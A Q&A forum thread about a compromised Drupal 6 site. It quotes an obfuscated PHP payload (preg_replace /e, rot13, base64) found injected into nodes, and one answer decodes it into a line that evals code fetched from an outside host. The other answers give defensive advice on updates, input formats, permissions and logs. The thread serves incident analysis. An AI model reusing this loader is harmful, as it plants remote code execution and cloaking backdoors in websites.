Drupal 6中的SQL PHP注入攻击

Question

Today, all the nodes in my drupal 6 site appeared with this added php script

 ?php $node->nid = 849;
     preg_replace('/^(.'.'*'.')$/'.'e', preg_replace('/^(.'.'*'.')$/'.'e', 'str'.'_'.'rot'.(27-14).'(\'\1\')', 'riny(onfr'.(12*3+4*7).'_qrpbqr(\\'.(2/2).'))'), 'aWYoIWZ1bmN0aW9uX2V4aXN0cygnbm9kZV91cGRhdGVfbG9nJykpQGV2YWwoQGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vc3NlZHJ1cC5vcmcvYXQvcl9pbmMucGhwJykpOwppZihmdW5jdGlvbl9leGlzdHMoJ25vZGVfdXBkYXRlX2xvZycpKW5vZGVfdXBkYXRlX2xvZygkbm9kZSk7');

    if(@$node->body):
    ?php echo @$node->title;?
    ?php echo @$node->body;?
    ?php else:?

    ... here would go the original text of the node

    ?php endif;?

(I´ve removed some symbols to make sure you can correctly read the php code)

So, I guess this means that somebody was able to update the information in the drupal tables and inject this php script.

1 - What is this PHP code doing (if anything)? (of course apart from preventing the visualization of the node content)
2 - Any idea of how did they manage to do this? Is a Drupal security leak? a Mysql one? 3 - I guess the only way to reinstaurate this is by completely restoring the database...

Answer 1

The guy that made this, has really tried to make the code hard to read.

I'm not 100% sure how exactly this works, but the end result of the top line is something like this:

if(!function_exists('node_update_log'))@eval(@file_get_contents('http://ssedrup.org/at/r_inc.php'));
if(function_exists('node_update_log'))node_update_log($node);

Whoever made this targeted your site because it's a Drupal site, are you runnning up to date version? They could be exploiting a known security hole in Drupal / a contributed Drupal module. Are you using php filters in your Drupal nodes, this could be the access point.

I took a look at the code linked to, which was made hard to read as well. That is the code that is responsible for updating all of your nodes. It seems like the goal was to show special content for the search engine crawlers by looking at the IP address. That is a SEO strategy known as clocking.

Anyways the link to the actual code that is run :

In short this attack on your site, was meant to hide the fact that search engine would index some special contents on your site. This is probably made to boost SEO for some site. The one who made this really know what he wanted to do and how to do it.

Answer 2

I assume you've got an up-to-date installation of Drupal and all the modules you're using. That's the biggest thing you need to be sure of -- keep an eye on Drupal versions and always upgrade when a security update is released.

However, it's far more likely to be one of your modules that has a security flaw rather than the Drupal core. There have been (and likely still are) flaws in Drupal itself, but the really nasty issues have tended to be in modules.

The reason for this is that modules tend to be written by third-parties, who may or may not have a good understanding of good security practice. And whereas the core is used by everyone and gets a lot of developer attention, most modules won't have such broad usage, so they get less development work, less testing and less usage, so bugs are less likely to be spotted.

Have a look at the non-core modules you've used for your site (it might help to edit your question to list them here, on the off chance someone knows something specific).

Use Google to search for drupal modulename security or something similar, and see what turns up. Also visit their pages on drupal.org and read the notes there; see how active the project is - when was the module last updated? and how often? how many developers have worked on it? etc - if those figures are low, consider finding an alternative module to do the same job.

If your PHP skills are good enough (and you have the time), you could do a code review of them to see if you can spot anything.

Of course, it may not be a drupal issue at all. If you're on a shared hosting platform, the box could have been compromised by a security issue on any one of the hosted sites, resulting in all sites on the box being compromised (this happened to me one - not good). But since the code that was injected is drupal-specific, it would seem that it's likely to be a drupal hack, so the main suspect must remain your installation.

Hope that helps.

Answer 3

You may have you "input formats" set wrong. Note, that the "default" format is the one accessible by everyone. If you set "FULL HTML" as "default", you open up your site to many XSS exploits. If you set it to "PHP" you open it up to about everyone. "Default" does not mean that it only becomes the default format, ie the one selected already. It implies that everyone, including all those who can comment and post nodes, can insert any kind of PHP.

Answer 4

In addition to the advice mentioned, you should audit your permissions. It is possible that the hacker found a way in that didn't exploit a security hole (XML-RPC, PHP filter on for non-admins, etc).

Looking through server logs, potentially limiting to POSTs, may provide some information on how it happened.

It is also possible that the hacker also directly accessed the database server and bypassed Drupal itself.

Answer 5

Do not forget to check your permissions. Sometimes a developer forgets to prevent editing from anonymous users and it can take a while until you find about it.